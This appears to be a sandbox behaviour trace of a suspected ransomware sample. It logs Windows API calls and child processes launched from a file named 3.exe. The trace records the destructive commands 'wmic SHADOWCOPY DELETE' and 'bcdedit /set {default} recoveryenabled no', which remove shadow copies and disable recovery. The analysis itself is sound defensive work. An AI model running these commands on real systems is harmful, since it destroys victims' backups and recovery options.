	[0033.757] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0033.757] GetProcessHeap () returned 0x330000
	[0033.757] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xe8) returned 0x349e00
	[0033.757] GetProcessHeap () returned 0x330000
	[0033.757] RtlReAllocateHeap (Heap=0x330000, Flags=0x0, Ptr=0x349e00, Size=0x7e) returned 0x349e00
	[0033.757] GetProcessHeap () returned 0x330000
	[0033.757] RtlSizeHeap (HeapHandle=0x330000, Flags=0x0, MemoryPointer=0x349e00) returned 0x7e
	[0033.758] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0033.758] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x1ceb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb00) returned 0xffffffffffffffff
	[0033.758] GetLastError () returned 0x2
	[0033.758] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wmic", fInfoLevelId=0x1, lpFindFileData=0x1ceb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb00) returned 0xffffffffffffffff
	[0033.758] GetLastError () returned 0x2
	[0033.759] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0033.759] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x1ceb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb00) returned 0xffffffffffffffff
	[0034.038] GetLastError () returned 0x2
	[0034.038] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic", fInfoLevelId=0x1, lpFindFileData=0x1ceb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb00) returned 0xffffffffffffffff
	[0034.038] GetLastError () returned 0x2
	[0034.038] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0034.038] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x1ceb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb00) returned 0xffffffffffffffff
	[0034.039] GetLastError () returned 0x2
	[0034.039] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic", fInfoLevelId=0x1, lpFindFileData=0x1ceb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb00) returned 0xffffffffffffffff
	[0034.039] GetLastError () returned 0x2
	[0034.039] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0034.039] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x1ceb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb00) returned 0x349e90
	[0034.039] GetProcessHeap () returned 0x330000
	[0034.039] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x0, Size=0x28) returned 0x344610
	[0034.039] FindClose (in: hFindFile=0x349e90 | out: hFindFile=0x349e90) returned 1
	[0034.039] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x1ceb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb00) returned 0xffffffffffffffff
	[0034.039] GetLastError () returned 0x2
	[0034.039] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ceb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb00) returned 0x349e90
	[0034.039] GetProcessHeap () returned 0x330000
	[0034.040] RtlReAllocateHeap (Heap=0x330000, Flags=0x0, Ptr=0x344610, Size=0x8) returned 0x348900
	[0034.040] FindClose (in: hFindFile=0x349e90 | out: hFindFile=0x349e90) returned 1
	[0034.040] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0034.040] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0034.040] GetConsoleTitleW (in: lpConsoleTitle=0x1cf050, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe") returned 0x2b
	[0034.040] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cee08, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cedc8 | out: lpAttributeList=0x1cee08, lpSize=0x1cedc8) returned 1
	[0034.040] UpdateProcThreadAttribute (in: lpAttributeList=0x1cee08, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cedb8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cee08, lpPreviousValue=0x0) returned 1
	[0034.040] GetStartupInfoW (in: lpStartupInfo=0x1cef20 | out: lpStartupInfo=0x1cef20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) 
	[0034.040] GetProcessHeap () returned 0x330000
	[0034.040] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x20) returned 0x344610
	[0034.040] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0034.040] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0034.040] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0034.040] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0034.040] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0034.040] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0034.040] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0034.040] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0034.040] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0034.040] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0034.040] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0034.040] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0034.040] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0034.040] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0034.040] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0034.040] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0034.041] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0034.041] GetProcessHeap () returned 0x330000
	[0034.041] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x344610 | out: hHeap=0x330000) returned 1
	[0034.041] GetProcessHeap () returned 0x330000
	[0034.041] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x12) returned 0x349e90
	[0034.041] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1
	[0034.043] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="wmic  SHADOWCOPY DELETE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1cee40*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wmic  SHADOWCOPY DELETE", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cedf0 | out: lpCommandLine="wmic  SHADOWCOPY DELETE", lpProcessInformation=0x1cedf0*(hProcess=0x54, hThread=0x50, dwProcessId=0x9d0, dwThreadId=0x9d4)) returned 1
	[0034.056] CloseHandle (hObject=0x50) returned 1
	[0034.056] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0034.056] GetProcessHeap () returned 0x330000
	[0034.057] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34c230 | out: hHeap=0x330000) returned 1
	[0034.057] GetEnvironmentStringsW () returned 0x34bf20*
	[0034.057] GetProcessHeap () returned 0x330000
	[0034.057] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xae8) returned 0x34ca10
	[0034.057] FreeEnvironmentStringsW (penv=0x34bf20) returned 1
	[0034.057] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0
	[0049.421] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1ced38 | out: lpExitCode=0x1ced38*=0x80041002) returned 1
	[0049.421] CloseHandle (hObject=0x54) returned 1
	[0049.421] _vsnwprintf (in: _Buffer=0x1cefa8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ced48 | out: _Buffer="80041002") returned 8
	[0049.421] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="80041002") returned 1
	[0049.422] GetProcessHeap () returned 0x330000
	[0049.422] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34ca10 | out: hHeap=0x330000) returned 1
	[0049.422] GetEnvironmentStringsW () returned 0x34bf20*
	[0049.422] GetProcessHeap () returned 0x330000
	[0049.422] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xb0e) returned 0x34e020
	[0049.422] FreeEnvironmentStringsW (penv=0x34bf20) returned 1
	[0049.422] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0049.422] GetProcessHeap () returned 0x330000
	[0049.422] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34e020 | out: hHeap=0x330000) returned 1
	[0049.422] GetEnvironmentStringsW () returned 0x34bf20*
	[0049.422] GetProcessHeap () returned 0x330000
	[0049.422] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xb0e) returned 0x34e020
	[0049.422] FreeEnvironmentStringsW (penv=0x34bf20) returned 1
	[0049.422] GetProcessHeap () returned 0x330000
	[0049.422] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x349e90 | out: hHeap=0x330000) returned 1
	[0049.422] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cee08 | out: lpAttributeList=0x1cee08) 
	[0049.422] _get_osfhandle (_FileHandle=1) returned 0x7
	[0049.422] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0049.422] _get_osfhandle (_FileHandle=1) returned 0x7
	[0049.422] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3de194 | out: lpMode=0x4a3de194) returned 1
	[0049.423] _get_osfhandle (_FileHandle=0) returned 0x3
	[0049.423] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3de198 | out: lpMode=0x4a3de198) returned 1
	[0049.423] SetConsoleInputExeNameW () returned 0x1
	[0049.423] GetConsoleOutputCP () returned 0x1b5
	[0049.423] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3ebfe0 | out: lpCPInfo=0x4a3ebfe0) returned 1
	[0049.423] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0049.423] exit (_Code=-2147217406) 

Process:
	id = "9"
	image_name = "bcdedit.exe"
	filename = "c:\\windows\\system32\\bcdedit.exe"
	page_root = "0x4f579000"
	os_pid = "0x9c8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "4"
	os_parent_pid = "0x9a0"
	cmd_line = "bcdedit  /set {default} recoveryenabled no"
	cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 29
	os_tid = 0x9cc


Process:
	id = "10"
	image_name = "wmic.exe"
	filename = "c:\\windows\\system32\\wbem\\wmic.exe"
	page_root = "0x506fe000"
	os_pid = "0x9d0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "8"
	os_parent_pid = "0x9c0"
	cmd_line = "wmic  SHADOWCOPY DELETE"
	cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 30
	os_tid = 0x9d4

	[0035.539] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1bfba0 | out: lpSystemTimeAsFileTime=0x1bfba0*(dwLowDateTime=0xc26dc4f0, dwHighDateTime=0x1d5956c)) 
	[0035.539] GetCurrentProcessId () returned 0x9d0
	[0035.539] GetCurrentThreadId () returned 0x9d4
	[0035.539] GetTickCount () returned 0x1142f1c
	[0035.539] QueryPerformanceCounter (in: lpPerformanceCount=0x1bfba8 | out: lpPerformanceCount=0x1bfba8*=15564409115) returned 1
	[0035.540] GetModuleHandleW (lpModuleName=0x0) returned 0xff690000
	[0035.540] __set_app_type (_Type=0x1) 
	[0035.540] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff6dced0) returned 0x0
	[0035.540] __wgetmainargs (in: _Argc=0xff702380, _Argv=0xff702390, _Env=0xff702388, _DoWildCard=0, _StartInfo=0xff70239c | out: _Argc=0xff702380, _Argv=0xff702390, _Env=0xff702388) returned 0
	[0035.571] ??0CHString@@QEAA@XZ () returned 0xff702ab0
	[0035.593] malloc (_Size=0x30) returned 0x135a50
	[0035.599] malloc (_Size=0x70) returned 0x135a90
	[0035.599] malloc (_Size=0x50) returned 0x137aa0
	[0035.599] malloc (_Size=0x30) returned 0x137b00
	[0035.599] malloc (_Size=0x48) returned 0x137b40
	[0035.599] malloc (_Size=0x30) returned 0x137b90
	[0035.599] malloc (_Size=0x30) returned 0x137bd0
	[0035.599] ??0CHString@@QEAA@XZ () returned 0xff702f58
	[0035.599] malloc (_Size=0x30) returned 0x137c10
	[0035.599] ?Empty@CHString@@QEAAXXZ () returned 0x7fef875482c
	[0035.599] SetConsoleCtrlHandler (HandlerRoutine=0xff6d5724, Add=1) returned 1
	[0035.599] _onexit (_Func=0xff6ef378) returned 0xff6ef378
	[0035.600] _onexit (_Func=0xff6ef490) returned 0xff6ef490
	[0035.600] _onexit (_Func=0xff6ef4d0) returned 0xff6ef4d0
	[0035.600] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0035.600] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0035.604] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0035.704] CoCreateInstance (in: rclsid=0xff6973a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff697370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff702940 | out: ppv=0xff702940*=0x1f1390) returned 0x0
	[0035.929] GetCurrentProcess () returned 0xffffffffffffffff
	[0035.929] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1bf970 | out: TokenHandle=0x1bf970*=0xf4) returned 1
	[0035.930] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1bf968 | out: TokenInformation=0x0, ReturnLength=0x1bf968) returned 0
	[0035.930] malloc (_Size=0x118) returned 0x1363e0
	[0035.930] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x1363e0, TokenInformationLength=0x118, ReturnLength=0x1bf968 | out: TokenInformation=0x1363e0, ReturnLength=0x1bf968) returned 1
	[0035.930] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x1363e0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-532950730, Attributes=0xf925), (Luid.LowPart=0x0, Luid.HighPart=1277824, Attributes=0x0), (Luid.LowPart=0x6d0061, Luid.HighPart=4587552, Attributes=0x6c0069), (Luid.LowPart=0x43005c, Luid.HighPart=7143535, Attributes=0x6f006d), (Luid.LowPart=0x690046, Luid.HighPart=6619244, Attributes=0x73), (Luid.LowPart=0x6d006d, Luid.HighPart=7209071, Attributes=0x720050))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0035.930] free (_Block=0x1363e0) 
	[0035.930] CloseHandle (hObject=0xf4) returned 1
	[0035.952] malloc (_Size=0x40) returned 0x137f80
	[0035.953] malloc (_Size=0x40) returned 0x1363e0
	[0035.953] malloc (_Size=0x40) returned 0x136430
	[0035.953] malloc (_Size=0x20a) returned 0x136480
	[0035.953] GetSystemDirectoryW (in: lpBuffer=0x136480, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0035.960] free (_Block=0x136480) 
	[0035.960] malloc (_Size=0x18) returned 0x38dfb0
	[0035.960] malloc (_Size=0x18) returned 0x136480
	[0035.960] malloc (_Size=0x18) returned 0x1364a0
	[0035.960] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13
	[0035.960] SysStringLen (param_1="\\kernel32.dll") returned 0xd
	[0035.961] free (_Block=0x38dfb0) 
	[0035.961] free (_Block=0x136480) 
	[0035.961] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x76e30000
	[0035.966] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40
	[0035.968] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0035.968] FreeLibrary (hLibModule=0x76e30000) returned 1
	[0035.968] free (_Block=0x1364a0) 
	[0035.968] _vsnwprintf (in: _Buffer=0x136430, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x1bf598 | out: _Buffer="ms_409") returned 6
	[0035.968] malloc (_Size=0x20) returned 0x136480
	[0035.969] GetComputerNameW (in: lpBuffer=0x136480, nSize=0x1bf970 | out: lpBuffer="XDUWTFONO", nSize=0x1bf970) returned 1
	[0035.969] lstrlenW (lpString="XDUWTFONO") returned 9
	[0035.969] malloc (_Size=0x14) returned 0x38dfb0
	[0035.969] lstrlenW (lpString="XDUWTFONO") returned 9
	[0035.969] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x1bf968 | out: lpNameBuffer=0x0, nSize=0x1bf968) returned 0x7fffffde000
	[0035.970] GetLastError () returned 0xea
	[0035.970] malloc (_Size=0x40) returned 0x1364b0
	[0035.970] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1364b0, nSize=0x1bf968 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1bf968) returned 0x1
	[0035.971] lstrlenW (lpString="") returned 0
	[0035.971] lstrlenW (lpString="XDUWTFONO") returned 9
	[0035.971] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3
	[0035.973] lstrlenW (lpString=".") returned 1
	[0035.973] lstrlenW (lpString="XDUWTFONO") returned 9
	[0035.973] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3
	[0035.973] lstrlenW (lpString="LOCALHOST") returned 9
	[0035.974] lstrlenW (lpString="XDUWTFONO") returned 9
	[0035.974] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3
	[0035.974] lstrlenW (lpString="XDUWTFONO") returned 9
	[0035.974] lstrlenW (lpString="XDUWTFONO") returned 9
	[0035.974] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2
	[0035.974] free (_Block=0x38dfb0) 
	[0035.974] lstrlenW (lpString="XDUWTFONO") returned 9
	[0035.974] malloc (_Size=0x14) returned 0x38dfb0
	[0035.974] lstrlenW (lpString="XDUWTFONO") returned 9
	[0035.974] lstrlenW (lpString="XDUWTFONO") returned 9
	[0035.974] malloc (_Size=0x14) returned 0x136500
	[0035.974] lstrlenW (lpString="XDUWTFONO") returned 9
	[0035.974] malloc (_Size=0x8) returned 0x136520
	[0035.974] malloc (_Size=0x18) returned 0x136540
	[0035.974] malloc (_Size=0x30) returned 0x136560
	[0035.974] malloc (_Size=0x18) returned 0x1365a0
	[0035.974] SysStringLen (param_1="IDENTIFY") returned 0x8
	[0035.974] SysStringLen (param_1="ANONYMOUS") returned 0x9
	[0035.974] SysStringLen (param_1="ANONYMOUS") returned 0x9
	[0035.974] SysStringLen (param_1="IDENTIFY") returned 0x8
	[0035.974] malloc (_Size=0x30) returned 0x1365c0
	[0035.974] malloc (_Size=0x18) returned 0x136600
	[0035.974] SysStringLen (param_1="IMPERSONATE") returned 0xb
	[0035.974] SysStringLen (param_1="ANONYMOUS") returned 0x9
	[0035.975] SysStringLen (param_1="IMPERSONATE") returned 0xb
	[0035.975] SysStringLen (param_1="IDENTIFY") returned 0x8
	[0035.975] SysStringLen (param_1="IDENTIFY") returned 0x8
	[0035.975] SysStringLen (param_1="IMPERSONATE") returned 0xb
	[0035.975] malloc (_Size=0x30) returned 0x136620
	[0035.975] malloc (_Size=0x18) returned 0x136660
	[0035.975] SysStringLen (param_1="DELEGATE") returned 0x8
	[0035.975] SysStringLen (param_1="IDENTIFY") returned 0x8
	[0035.975] SysStringLen (param_1="DELEGATE") returned 0x8
	[0035.975] SysStringLen (param_1="ANONYMOUS") returned 0x9
	[0035.975] SysStringLen (param_1="ANONYMOUS") returned 0x9
	[0035.975] SysStringLen (param_1="DELEGATE") returned 0x8
	[0035.975] malloc (_Size=0x30) returned 0x136680
	[0035.975] malloc (_Size=0x18) returned 0x1366c0
	[0035.975] malloc (_Size=0x30) returned 0x1366e0
	[0035.975] malloc (_Size=0x18) returned 0x136720
	[0035.975] SysStringLen (param_1="NONE") returned 0x4
	[0035.975] SysStringLen (param_1="DEFAULT") returned 0x7
	[0035.975] SysStringLen (param_1="DEFAULT") returned 0x7
	[0035.975] SysStringLen (param_1="NONE") returned 0x4
	[0035.975] malloc (_Size=0x30) returned 0x136740
	[0035.975] malloc (_Size=0x18) returned 0x136780
	[0035.975] SysStringLen (param_1="CONNECT") returned 0x7
	[0035.975] SysStringLen (param_1="DEFAULT") returned 0x7
	[0035.975] malloc (_Size=0x30) returned 0x1367a0
	[0035.975] malloc (_Size=0x18) returned 0x1367e0
	[0035.975] SysStringLen (param_1="CALL") returned 0x4
	[0035.975] SysStringLen (param_1="DEFAULT") returned 0x7
	[0035.975] SysStringLen (param_1="CALL") returned 0x4
	[0035.975] SysStringLen (param_1="CONNECT") returned 0x7
	[0035.975] malloc (_Size=0x30) returned 0x136800
	[0035.976] malloc (_Size=0x18) returned 0x136840
	[0035.976] SysStringLen (param_1="PKT") returned 0x3
	[0035.976] SysStringLen (param_1="DEFAULT") returned 0x7
	[0035.976] SysStringLen (param_1="PKT") returned 0x3
	[0035.976] SysStringLen (param_1="NONE") returned 0x4
	[0035.976] SysStringLen (param_1="NONE") returned 0x4
	[0035.976] SysStringLen (param_1="PKT") returned 0x3
	[0035.976] malloc (_Size=0x30) returned 0x136860
	[0035.976] malloc (_Size=0x18) returned 0x1368a0
